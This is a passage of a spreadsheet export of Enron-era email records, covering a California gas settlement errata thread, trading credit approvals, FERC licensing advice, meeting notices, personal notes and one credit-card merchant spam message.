'tp3dlr@socalgas.com', 'karpjos@sf.whitecase.com', 'wsakarias@sdge.com', 'rbeamish@sempra.com', 'mday@gmssr.com', 'swatson@socalgas.com', 'gsullivan@sempra.com', 'jfawcet@enron.com', 'douglass@arterhadden.com', 'jsuwara@sempra.com', 'eke@aelaw.com', 'david.bayless@utility.com'})</t>
  </si>
  <si>
    <t>RE: GIR</t>
  </si>
  <si>
    <t xml:space="preserve">As an additional clarification, Coral Energy has informed me that they do not _x000D_
support either the Wheeler Ridge revisions or the Pooling Provisions.? _x000D_
_x000D_
-----Original Message----- _x000D_
From: Cherry, Brian - TPBKC _x000D_
Sent: Friday, April 28, 2000 8:28 AM _x000D_
To: 'Craig Chancellor'; Cherry, Brian - TPBKC; 'AlexanMS@sce.com'; _x000D_
'paulamirault@aec.ca'; 'david.bayless@utility.com'; _x000D_
'Tomb@crossborderenergy.com'; 'Burkee@cts.com'; _x000D_
'Rick.Counihan@greenmountain.com'; 'Jdasovic@enron.com'; _x000D_
'Mday@gmssr.com'; 'bdingwall@unitedgas.com'; 'Douglass@arterhadden.com'; _x000D_
'eke@aelaw.com'; 'Jfawcet@enron.com'; 'rfoss@coral-energy.com'; _x000D_
'plg@cpuc.ca.gov'; 'johnj@bcjlaw.com'; 'Johnson_Pamela@lacoe.edu'; _x000D_
'karpjos@sf.whitecase.com'; 'jleslie@luce.com'; 'kmccrea@sablaw.com'; _x000D_
'jmpa@dynegy.com'; 'rmp@cpuc.ca.gov'; 'porterdk@sce.com'; _x000D_
'RochmanM@cubjpa.org'; 'RochmanM@spurr.org'; 'susan.scott@enron.com'; _x000D_
Beamish, Richard - TPRMB; Betonte, Robert - TP2RSB; Brill, Thomas R.; _x000D_
Cotton, Gary; Davis, Robert E.; Davis, Steven D.; Fair, Pam; Follett, B. _x000D_
David - TPDBF; Fong, Ed; Freeman, Kimberly; Gaines, Mark - TPMFG; _x000D_
Harrigan, James P. - TP1JPH; Hay, James E.; Hubbard, Lisa J.; Lorenz, _x000D_
Lad - TPLPL; McVay, Nancy W - TPNWM; Morrow, Rick - TP3RMM; Purves, _x000D_
Ralph A.; Rawlings, Roy - TP4RMR; Reed, Debra L. - TP3DLR; Reed, _x000D_
William; Sakarias, Wayne P.; Schavrien, Lee; Smith, Anne S. - TPASS; _x000D_
Stewart, Lee M. - TP4LMS; Sullivan, Glen J.; Surak, Thomas M. - TP1TMS; _x000D_
Suwara, J.- TPJUS; Takemura, Earl - TPEKT; Teeter, James S.; Van Lierop, _x000D_
Jan - TP2JXV; Watson, Steven - TP2SAW; Wright, Gillian - TP1GXW; Barker, _x000D_
David - TPDTB; 'How-Downing, Lindsey'; 'Jun, Christine'; 'Gileau, Pat'; _x000D_
'Khoury, Dexter' _x000D_
Cc: Sullivan, Glen J.; Watson, Steven - TP2SAW; Lorenz, Lad - TPLPL; _x000D_
Nelson, Eric B. - TPEBN _x000D_
Subject: RE: GIR _x000D_
_x000D_
Let me clarify two of the more substantive matters that were not included in _x000D_
the errata - Wheeler Ridge and the Pooling Revisions.? The first, Wheeler _x000D_
Ridge, was not included in the errata because of concerns expressed by IP and _x000D_
ORA about the impact these changes would have on Kern River shippers.? _x000D_
SoCalGas did not oppose the revision and would accept the language as _x000D_
proposed by PG&amp;E, especially if it would gain their non-opposition.? There _x000D_
was also a concern expressed by some parties that the WR revisions went _x000D_
beyond the bounds of an errata and should be considered a revision of the _x000D_
settlement.?? As for the Pooling Revisions, Dynegy expressed reservations _x000D_
about the proposed changes that included substantial increases in the number _x000D_
of pools available per shipper.? Dynegy was not able to garner internal _x000D_
approval in time for us to prepare the errata for filing later today, so _x000D_
Pooling revisions were taken off the table.? SoCalGas supports the pooling _x000D_
revisions and no other party expressed any concerns.? ALJ Biren asked us to _x000D_
file a revised settlement document with the corrected pages included and to _x000D_
mail it out to the parties today, so our already compressed deadline for _x000D_
getting this out the door was even more compressed.? _x000D_
_x000D_
Since I was unable to get resolution from all of the parties of the _x000D_
outstanding differences, I could not include the revisions that were _x000D_
circulated (to our dismay).? PG&amp;E has now indicated they will file limited _x000D_
opposition and they have now served a discovery request upon SoCalGas with _x000D_
regard to Wheeler Ridge._x000D_
_x000D_
_x000D_
-----Original Message----- _x000D_
From: Craig Chancellor [mailto:craigc@calpine.com] _x000D_
Sent: Friday, April 28, 2000 8:15 AM _x000D_
To: 'Cherry, Brian - TPBKC'; 'AlexanMS@sce.com'; 'paulamirault@aec.ca'; _x000D_
'david.bayless@utility.com'; 'Tomb@crossborderenergy.com'; _x000D_
'Burkee@cts.com'; Craig Chancellor; 'Rick.Counihan@greenmountain.com'; _x000D_
'Jdasovic@enron.com'; 'Mday@gmssr.com'; 'bdingwall@unitedgas.com'; _x000D_
'Douglass@arterhadden.com'; 'eke@aelaw.com'; 'Jfawcet@enron.com'; _x000D_
'rfoss@coral-energy.com'; 'plg@cpuc.ca.gov'; 'johnj@bcjlaw.com'; _x000D_
'Johnson_Pamela@lacoe.edu'; 'karpjos@sf.whitecase.com'; _x000D_
'jleslie@luce.com'; 'kmccrea@sablaw.com'; 'jmpa@dynegy.com'; _x000D_
'rmp@cpuc.ca.gov'; 'porterdk@sce.com'; 'RochmanM@cubjpa.org'; _x000D_
'RochmanM@spurr.org'; 'susan.scott@enron.com'; Beamish, Richard - TPRMB; _x000D_
Betonte, Robert - TP2RSB; Brill, Thomas R.; Cotton, Gary; Davis, Robert _x000D_
E.; Davis, Steven D.; Fair, Pam; Follett, B. David - TPDBF; Fong, Ed; _x000D_
Freeman, Kimberly; Gaines, Mark - TPMFG; Harrigan, James P. - TP1JPH; _x000D_
Hay, James E.; Hubbard, Lisa J.; Lorenz, Lad - TPLPL; McVay, Nancy W - _x000D_
TPNWM; Morrow, Rick - TP3RMM; Purves, Ralph A.; Rawlings, Roy - TP4RMR; _x000D_
Reed, Debra L. - TP3DLR; Reed, William; Sakarias, Wayne P.; Schavrien, _x000D_
Lee; Smith, Anne S. - TPASS; Stewart, Lee M. - TP4LMS; Sullivan, Glen _x000D_
J.; Surak, Thomas M. - TP1TMS; Suwara, J.- TPJUS; Takemura, Earl - _x000D_
TPEKT; Teeter, James S.; Van Lierop, Jan - TP2JXV; Watson, Steven - _x000D_
TP2SAW; Wright, Gillian - TP1GXW; Barker, David - TPDTB; 'How-Downing, _x000D_
Lindsey'; 'Jun, Christine'; 'Gileau, Pat'; 'Khoury, Dexter' _x000D_
Cc: Sullivan, Glen J.; Watson, Steven - TP2SAW; Lorenz, Lad - TPLPL; _x000D_
Nelson, Eric B. - TPEBN _x000D_
Subject: RE: GIR _x000D_
_x000D_
Brian, _x000D_
_x000D_
I did not see a change on the Wheeler Ridge capacity issue that was put _x000D_
forth earlier.? Several parties supported the change including Calpine, SCE, _x000D_
WHP and WGS and no opposition was voiced.? It is my understanding that PG&amp;E _x000D_
will not sign on to the Settlement even if this change is made but will _x000D_
agree not to oppose (this issue and many others).? Not only does the change _x000D_
itself make sense but there is a lot of value in not having another front to _x000D_
do battle on in the hearing process.? Is SoCalGas opposed to this change? _x000D_
And if so, why? _x000D_
_x000D_
Thanks _x000D_
_x000D_
Craig _x000D_
_x000D_
&gt; -----Original Message----- _x000D_
&gt; From: Cherry, Brian - TPBKC [SMTP:BCherry@sempra.com] _x000D_
&gt; Sent: Friday, April 28, 2000 7:46 AM _x000D_
&gt; To:?? 'AlexanMS@sce.com'; 'paulamirault@aec.ca'; _x000D_
&gt; 'david.bayless@utility.com'; 'Tomb@crossborderenergy.com'; _x000D_
&gt; 'Burkee@cts.com'; 'Craigc@calpine.com'; 'Rick.Counihan@greenmountain.com'; _x000D_
&gt; 'Jdasovic@enron.com'; 'Mday@gmssr.com'; 'bdingwall@unitedgas.com'; _x000D_
&gt; 'Douglass@arterhadden.com'; 'eke@aelaw.com'; 'Jfawcet@enron.com'; _x000D_
&gt; 'rfoss@coral-energy.com'; 'plg@cpuc.ca.gov'; 'johnj@bcjlaw.com'; _x000D_
&gt; 'Johnson_Pamela@lacoe.edu'; 'karpjos@sf.whitecase.com'; _x000D_
&gt; 'jleslie@luce.com'; 'kmccrea@sablaw.com'; 'jmpa@dynegy.com'; _x000D_
&gt; 'rmp@cpuc.ca.gov'; 'porterdk@sce.com'; 'RochmanM@cubjpa.org'; _x000D_
&gt; 'RochmanM@spurr.org'; 'susan.scott@enron.com'; Beamish, Richard - TPRMB; _x000D_
&gt; Betonte, Robert - TP2RSB; Brill, Thomas R.; Cotton, Gary; Davis, Robert _x000D_
&gt; E.; Davis, Steven D.; Fair, Pam; Follett, B. David - TPDBF; Fong, Ed; _x000D_
&gt; Freeman, Kimberly; Gaines, Mark - TPMFG; Harrigan, James P. - TP1JPH; Hay, _x000D_
&gt; James E.; Hubbard, Lisa J.; Lorenz, Lad - TPLPL; McVay, Nancy W - TPNWM; _x000D_
&gt; Morrow, Rick - TP3RMM; Purves, Ralph A.; Rawlings, Roy - TP4RMR; Reed, _x000D_
&gt; Debra L. - TP3DLR; Reed, William; Sakarias, Wayne P.; Schavrien, Lee; _x000D_
&gt; Smith, Anne S. -? TPASS; Stewart, Lee M. - TP4LMS; Sullivan, Glen J.; _x000D_
&gt; Surak, Thomas M. - TP1TMS; Suwara, J.- TPJUS; Takemura, Earl - TPEKT; _x000D_
&gt; Teeter, James S.; Van Lierop, Jan - TP2JXV; Watson, Steven - TP2SAW; _x000D_
&gt; Wright, Gillian - TP1GXW; Cherry, Brian - TPBKC; Barker, David - TPDTB; _x000D_
&gt; 'How-Downing, Lindsey'; 'Jun, Christine'; 'Gileau, Pat'; 'Khoury, Dexter' _x000D_
&gt; Cc:?? Cherry, Brian - TPBKC; Sullivan, Glen J.; Watson, Steven - TP2SAW; _x000D_
&gt; Lorenz, Lad - TPLPL; Nelson, Eric B. - TPEBN _x000D_
&gt; Subject:????? FW: GIR _x000D_
&gt; _x000D_
&gt; FYI.? The attached documents contain the errata we expect to file with the _x000D_
&gt; Commission later today.? As you can see, the changes are not substantive. _x000D_
&gt; _x000D_
&gt; -----Original Message----- _x000D_
&gt; From:?? Sullivan, Glen J. _x000D_
&gt; Sent:?? Thursday, April 27, 2000 5:58 PM _x000D_
&gt; To:???? Cherry, Brian - TPBKC _x000D_
&gt; Subject:??????? GIR _x000D_
&gt; _x000D_
&gt; &lt;&lt;ld2d-#69954-1.DOC&gt;&gt; &lt;&lt;ld2d-#69955-1.DOC&gt;&gt; _x000D_
&gt; _x000D_
&gt; Here's the draft errata filing (plus adding 2 new parties) for tomorrow. _x000D_
&gt; Can you circulate?? -- Glen _x000D_
&gt;? &lt;&lt; File: ld2d-#69954-1.DOC &gt;&gt;? &lt;&lt; File: ld2d-#69955-1.DOC &gt;&gt; </t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 07:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'edm1@home.com'})</t>
  </si>
  <si>
    <t>Re: To Say Hi!</t>
  </si>
  <si>
    <t>I'm thinking that I have probably missed you, but anyway, it was so nice to _x000D_
hear from you.  We're haviing Jordan's birthday party tonight.  So thwat's _x000D_
what we'll be doing this weekend!   Talk to you soon!_x000D_
_x000D_
Love Bernie</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 10:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: EOL Approvals: 05-30-01</t>
  </si>
  <si>
    <t xml:space="preserve">Engage Energy America LLC - Buy only until demonstrate have power marketer's _x000D_
licence._x000D_
Engage Energy Canada LP - Decline physical power unless can demonstrate _x000D_
physical business activity in US._x000D_
Otherwise Ditto Credit._x000D_
_x000D_
_x000D_
_x000D_
	Tana Jones@ECT_x000D_
	05/30/2001 05:23 PM_x000D_
		 _x000D_
		 To: Alan Aronowitz/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Marcus _x000D_
Nettelton/NA/Enron@ENRON, Harry M Collins/HOU/ECT@ECT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Robbi Rossi/Enron _x000D_
Communications@Enron Communications, John Viverito/Corp/Enron@Enron, Jane _x000D_
McBride/AP/Enron@Enron, Andrea Calo/SA/Enron@Enron, Peter Keohane/CAL/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: EOL Approvals: 05-30-01_x000D_
_x000D_
_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 05/30/2001 05:23 PM -----_x000D_
_x000D_
	Tom Moran/ENRON@enronXgate_x000D_
	05/30/2001 03:29 PM_x000D_
		 _x000D_
		 To: Karen Lambert/ENRON@enronXgate, Tana Jones/HOU/ECT@ECT, Samuel _x000D_
Schott/ENRON@enronXgate, Brant Reves/ENRON@enronXgate, Debbie R _x000D_
Brackett/ENRON@enronXgate, Cynthia Clark/ENRON@enronXgate, Enron Europe _x000D_
Global CounterParty/LON/ECT@ECT, Stephanie Sever/ENRON@enronXgate, Tom _x000D_
Moran/ENRON@enronXgate, Claudia Clark/ENRON@enronXgate, William S _x000D_
Bradford/ENRON@enronXgate, Lisa Lees/ENRON@enronXgate, Juana _x000D_
Fayett/ENRON@enronXgate, Jana Morse/Corp/Enron@Enron, Trang _x000D_
Le/ENRON@enronXgate, Paul Maley/LON/ECT@ECT, Sonya Clarke/LON/ECT@ECT, Tim _x000D_
Davies/LON/ECT@ECT, Karen O'Day/ENRON@enronXgate, Tanya _x000D_
Rohauer/ENRON@enronXgate, Kelly Lombardi/ENRON@enronXgate, Brian _x000D_
Lindsay/Enron Communications@Enron Communications, EOL Call Center@ECT, Bill _x000D_
D Hare/ENRON@enronXgate, Amy Heffernan/Enron Communications@Enron _x000D_
Communications, Molly LaFuze/Enron Communications@Enron Communications, Danny _x000D_
Clark/Enron Communications@Enron Communications, Stephanie _x000D_
Panus/NA/Enron@Enron, Teresa Mandola/ENRON@enronXgate, Bill _x000D_
Kyle/ENRON@enronXgate, Amber Ebow/ENRON@enronXgate, Thu Pham _x000D_
Arnold/ENRON@enronXgate, Tandra Coleman/ENRON@enronXgate, Lesli _x000D_
Campbell/ENRON@enronXgate, Wendi Lebrocq/ENRON@enronXgate, Mark _x000D_
Taylor/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: EOL Approvals: 05-30-01_x000D_
_x000D_
Please see attached_x000D_
_x000D_
 _x000D_
Regards,_x000D_
Tom Moran_x000D_
713-853-3017_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 19 Jan 2002 20:39:36 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sqobwyyrmdpyuwfu@aol.com'})</t>
  </si>
  <si>
    <t>frozenset({'ognoepevuhbfvfjq@aol.com'})</t>
  </si>
  <si>
    <t>No fee! Accept Credit Cards in 2002!_x000D_
                                                   [23ca6]</t>
  </si>
  <si>
    <t xml:space="preserve">Start Accepting Credit Cards Today!_x000D_
_x000D_
  &lt;http://www.coricainc.com/images/money.jpg&gt;_x000D_
Your business MUST be accepting Credit Cards from your customers!_x000D_
_x000D_
Over 97% of all sales on the Internet are done with Credit Cards._x000D_
_x000D_
Over 92% of mail orders and telephone-orders are done with Credit Cards._x000D_
_x000D_
If you don't take Credit Cards, 9 out of every 10 potential customers can't do business with you!_x000D_
_x000D_
We specialize in on-line businesses, mail order and telephone order businesses, start-ups, in-home businesses as well as retail locations._x000D_
_x000D_
* In other words, we specialize in YOUR business *_x000D_
_x000D_
_x000D_
Simply fill out this short application and _x000D_
a representative will contact you shortly._x000D_
_x000D_
 _x000D_
Applicant Information	 _x000D_
First Name:	  	_x000D_
Last Name:	  	_x000D_
Email Address:	  	_x000D_
Business Phone:	  	_x000D_
Home Phone:	  	_x000D_
Please place comments here_x000D_
  	_x000D_
 	_x000D_
_x000D_
sqobwyyrmdpyuwfu </t>
  </si>
  <si>
    <t>Thu, 30 Aug 2001 13:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Visit to Mariner w/Josey, Allen Keel &amp; Richard Clark</t>
  </si>
  <si>
    <t>i faxed the directions to your house.  Josey's mobile 713.805.2145/Mariner 281.584.8306</t>
  </si>
  <si>
    <t>Tue, 21 Dec 1999 05:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Misc. Questions</t>
  </si>
  <si>
    <t xml:space="preserve">Hhere are some questions for David that I already sent. Do you have anything _x000D_
else?_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Ami Chokshi/Corp/Enron on 12/21/99 01:49 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Ami Chokshi                           12/21/99 12:35 PM_x000D_
	_x000D_
_x000D_
To: dscott1@columbiaenergygroup.com_x000D_
cc:  _x000D_
_x000D_
Subject: Misc. Questions_x000D_
_x000D_
_x000D_
_x000D_
Questions:_x000D_
_x000D_
1.  At Agua Dulce, which pipe can the GP plant go into? Can it go into HPL?_x000D_
_x000D_
2. Do you have nom forms for any plant nominations we may need?_x000D_
_x000D_
3. For GEMC, is the Tejas plant at Thompsonville? Do you know how any of _x000D_
those points tie into HPL?_x000D_
_x000D_
4. Do you have avails for MOPS production? The gas that is transported to _x000D_
Tivoli--what contract do you use?_x000D_
_x000D_
5. For Kerr McGee, do you have the Entex contacts you speak with?_x000D_
_x000D_
6. Is there a Waskom nom form? With whom do you speak over there?_x000D_
_x000D_
7. For the avails sheet you sent, the first row of column titles is blacked _x000D_
out. Can you tell me what the row reads?_x000D_
_x000D_
8. What volumes will come from Koch Gathering into Carthage for next month? _x000D_
We show conflicting numbers._x000D_
_x000D_
Thanks,_x000D_
Ami_x000D_
713/853-9272_x000D_
_x000D_
---------------------- Forwarded by Ami Chokshi/Corp/Enron on 12/21/99 01:49 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Ami Chokshi                           12/21/99 01:48 PM_x000D_
	_x000D_
_x000D_
To: dscott1@columbiaenergygroup.com_x000D_
cc:  _x000D_
_x000D_
Subject: More Questions_x000D_
_x000D_
_x000D_
_x000D_
1.  At Carthage, the deliveries to Koch? What is that 15000 on your _x000D_
whiteboard for. Who is it to? Are the volumes termed up?_x000D_
_x000D_
2.  At Midcon Texas, you usually sell all the supply to its marketing _x000D_
affiliate, correct? Is so, is that gas termed up or do you sell it month to _x000D_
month?_x000D_
_x000D_
3. Is the gas to Entex off Tomcat sold as base or swing? Don't they change _x000D_
the volume occasionally?Has Anadarko given you any avails for Jan? _x000D_
_x000D_
Thanks,_x000D_
Ami_x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Jun 2000 04:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david.baumbach@enron.com', 'daren.farmer@enron.com', 'phillip.love@enron.com', "o'neal.winfree@enron.com", 'michael.walters@enron.com', 'eric.bass@enron.com', 'matthew.lenhart@enron.com'})</t>
  </si>
  <si>
    <t>schedule</t>
  </si>
  <si>
    <t>Here is our schedule. I need the 10 bucks from those of you who haven't paid _x000D_
yet. Do you want to try to get together this weekend and get some practice _x000D_
in? Let me know of your availability._x000D_
Bryan</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 03:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mbeckworth@velaw.com'})</t>
  </si>
  <si>
    <t>RE: Happy Thanksgiving!</t>
  </si>
  <si>
    <t>thanks for your note! not sure if you are in today at all, but if so, have a_x000D_
GREAT trip and be careful. happy turkey day too! mb_x000D_
_x000D_
-----Original Message-----_x000D_
From: Gerald.Nemec@enron.com [mailto:Gerald.Nemec@enron.com]_x000D_
Sent: Thursday, November 16, 2000 1:12 PM_x000D_
To: mbeckworth@velaw.com_x000D_
Subject: Happy Thanksgiving!_x000D_
_x000D_
_x000D_
Hey Melissa,_x000D_
_x000D_
I am trying desperately to do everything I need to before I leave tomorrow._x000D_
We are in the middle of performance reviews at Enron and I have to review_x000D_
about 10 others that I work with.  These are not easy to complete, but I_x000D_
guess I'll get through them._x000D_
_x000D_
Wanted to wish you a Happy Thanksgiving before I left.  Have fun in FW and_x000D_
at the game.  That is the hardest part of going to Spain right now.  I sold_x000D_
my tickets to the game, but I will be there in spirit._x000D_
_x000D_
We ought to go get some dinner after I get back.  I will be back next_x000D_
Monday.  Hopefully I won't have any disaster vacation stories of the type_x000D_
you told me at lunch!_x000D_
_x000D_
Take care,_x000D_
_x000D_
Gerald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Wed, 4 Apr 2001 02:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sherri.sera@enron.com', 'joannie.williamson@enron.com', 'rosalee.fleming@enron.com'})</t>
  </si>
  <si>
    <t>INVITATION</t>
  </si>
  <si>
    <t xml:space="preserve">Ken &amp; Jeff,_x000D_
_x000D_
We would like to extend an invitation to you for an event at the Guggenheim _x000D_
Museum in New York, honoring the Frank Gehry Exhibit which Enron is _x000D_
sponsoring.   Frank Gehry, a celebrated architect whose building appears at _x000D_
the end of our Ode to Why commercial, personifies innovation in the way he _x000D_
has "asked why," challenging nearly every convention in his field. _x000D_
_x000D_
Enron will have a table of 10 at the Trustee Opening Gala Dinner on May 16th, _x000D_
with cocktails at 7pm and a seated dinner at 8:30pm.  The Gala starts with a _x000D_
private viewing of the exhibition, followed by a seated dinner for 280 people _x000D_
in the Rotunda of the museum. Attendees are comprised of Trustees, government _x000D_
dignitaries, artists, curators and celebrities.  _x000D_
_x000D_
Several business unit executives are using this forum to take potential _x000D_
customers and we would like to know if you are interested in attending. _x000D_
Please advise. _x000D_
_x000D_
Thanks, Steve_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Feb 2001 03:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: A Request to Talk to One of our Customers</t>
  </si>
  <si>
    <t xml:space="preserve">I just spoke with Steve Doss and explained how to get a power marketer _x000D_
certificate at FERC (and EWG filing if necessary depending on who West Linn's _x000D_
partner is for plant ownership) and the 60 day (generally) time required _x000D_
(Although I think that FERC would be inclined to wave the 60 days based on _x000D_
the supply shortage in the West).  I also explained that EPMI is making a _x000D_
filing this week at FERC that would allow EPMI to provide some FERC filing _x000D_
services on behalf of industrial customers in order to facilitate their sales _x000D_
to the grid (when approved, hopefully in about 60 days).  He said that West _x000D_
Linn has not built the 2 cogens yet (43 MWs each of which West Linn would use _x000D_
appr. 17 MWs/hour), but that it is interested in setting up its licenses _x000D_
before the start of retail access on 10/1/01 in Oregon.  (An item to think _x000D_
about--I don't know anything about the Oregon retail program or current rate _x000D_
structure with PGE, but generally the lack of retail open access will not _x000D_
prevent an industrial on site generator from selling to the grid, unless its _x000D_
host utility rate schedule precludes it from doing so)._x000D_
_x000D_
I am sending him a FERC order issued last year dealing with industrials _x000D_
selling to the grid (InPower order), plus will send him the EPMI filing when _x000D_
we make it later this week._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
SHARI STACK_x000D_
02/21/2001 12:23 PM_x000D_
To: Christi L Nicolay/HOU/ECT@ECT_x000D_
cc: John Malowney/HOU/ECT@ECT _x000D_
_x000D_
Subject: A Request to Talk to One of our Customers_x000D_
_x000D_
Hi Christi- _x000D_
_x000D_
I just met with another potential customer who is going to buy power from us _x000D_
intially but may want to sell us power in the future due to a Cogen plant _x000D_
they are building. I asked if they were going to get a Power Marketers _x000D_
Certificate in order to sell the power and got a blank look. I mentioned that _x000D_
I had a colleague that could give them more information on how to go about _x000D_
getting this. _x000D_
_x000D_
Could you please call Steve Doss on (503) 557-6587 to point him in the right _x000D_
direction to getting the PMC?  He is with West Linn Paper Company here in _x000D_
Oregon._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Shari_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Jul 2001 03:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: RE: Legislative Report (07/05/2001) -- IEP</t>
  </si>
  <si>
    <t>i'd send to the big list.  i used to send what julie malinowski sent around.</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 10:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marie.newhouse@enron.com'})</t>
  </si>
  <si>
    <t>THANK YOU! Brown Bag - Dr. Kelly Williams</t>
  </si>
  <si>
    <t xml:space="preserve">How kind of you and Enron to think about employees like myself who have lost _x000D_
a beloved family member and who are having a hard time during this holiday _x000D_
season.  Dr. Williams' session below was very helpful, and I ran into 3 _x000D_
fellow employees that I work  with that I didn't even know were going through _x000D_
a similar situation.  Thank you very much._x000D_
_x000D_
Happy Holidays to you and yours._x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Marie Newhouse/Corp/Enron on 12/07/2000 _x000D_
06:05 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Corporate Benefits                           12/04/2000 08:07 PM_x000D_
	_x000D_
_x000D_
Sent by: Enron Announcements_x000D_
To: All Enron Downtown_x000D_
cc:  _x000D_
_x000D_
Subject: Brown Bag - Dr. Kelly Williams_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Jul 2001 15:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: California Updates</t>
  </si>
  <si>
    <t xml:space="preserve">I apologize.  I thought I'd put you on my "big" distribution list.  When and if I do any updates to smaller groups.  I'll put you on those, too.  Look forward to meeting and discussing next time I'm in Houston._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Kristin Walsh/ENRON@enronXgate 07/06/2001 12:12 PM 	   To: Jeff Dasovich/NA/Enron@Enron  cc:   Subject: California Updates	_x000D_
_x000D_
_x000D_
Jeff,_x000D_
	Hope everything in California is going well and hope you had a good 4th of July.  Earlier today, I was meeting with some people from EES/ENA and they mentioned that you send out regular updates on California.  I would be very interested in being added to the distribution list.  This would help us see if there are any discrepancies in what we independent report and give us insight on which issues need to be explored further.  If you are ever in Houston, I would love to meet with you and discuss some of our common interests as it relates to commercial operations.  Please let me know if you have any questions or are unable to add me to the distribution list.  _x000D_
_x000D_
Thanks,_x000D_
Kristin Walsh_x000D_
(713) 853-9510_x000D_
</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 09:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'brian.redmond@enron.com', 'c.thompson@enron.com', 'tim.belden@enron.com', 'janet.dietrich@enron.com', 'sally.beck@enron.com', 'jeff.donahue@enron.com', 'scott.neal@enron.com', 'beth.perlman@enron.com', 'david.oxley@enron.com', 'mark.haedicke@enron.com', 'raymond.bowen@enron.com', 'phillip.allen@enron.com', 'jordan.mintz@enron.com', 'christopher.calger@enron.com', 'max.yzaguirre@enron.com', 'hunter.shively@enron.com', 'w.duran@enron.com', 'rob.milnthorp@enron.com', 'joseph.deffner@enron.com', 'john.arnold@enron.com', 'kevin.presto@enron.com', 'scott.josey@enron.com'})</t>
  </si>
  <si>
    <t>This is a reminder !!!!!  There will be a Friday Meeting September 29th, _x000D_
2000.  _x000D_
_x000D_
     _x000D_
    _x000D_
    Date:  September 29, 2000_x000D_
      Friday_x000D_
_x000D_
    Time:   2:30 pm - 4:30 pm_x000D_
_x000D_
    Location:  30C1_x000D_
 _x000D_
    Topic:   ENA Management Committee_x000D_
_x000D_
      _x000D_
_x000D_
_x000D_
If you have any questions or conflicts, please feel free to call me (3-0643)._x000D_
_x000D_
Thanks,_x000D_
_x000D_
_x000D_
Kay 3-0643</t>
  </si>
  <si>
    <t>Sat, 5 Jan 2002 14:36:46 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/5/02; HourAhead hour: 17;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/5/02; HourAhead hour: 17;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010517.txt</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 05:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kimberly_kirkwood@hotmail.com'})</t>
  </si>
  <si>
    <t>Guz, just let me know what your plans are as time get closer and we will_x000D_
have to meet up.  Tell BUrns to get his butt in gear and plan out a night on_x000D_
the town.  Since I have only been home for a short while I am not totally_x000D_
familiar with the city night life yet but I am sure Burns knows where to go._x000D_
  Polyesters I heard is a great place to rally at but I don't know what_x000D_
nights are good there.  And I am going to have to work early in the morning_x000D_
so I will not be part taking in the binge drinking that normally occurs.  I_x000D_
am down to have a drink or two to be social and head out back home that_x000D_
night. So just keep me posted!!!_x000D_
_x000D_
lots of love, kim_x000D_
_x000D_
_______________________________________________________________________________x000D_
________x000D_
Get more from the Web.  FREE MSN Explorer download : http://explorer.msn.com</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 08:12:00 -0800 (PST)</t>
  </si>
  <si>
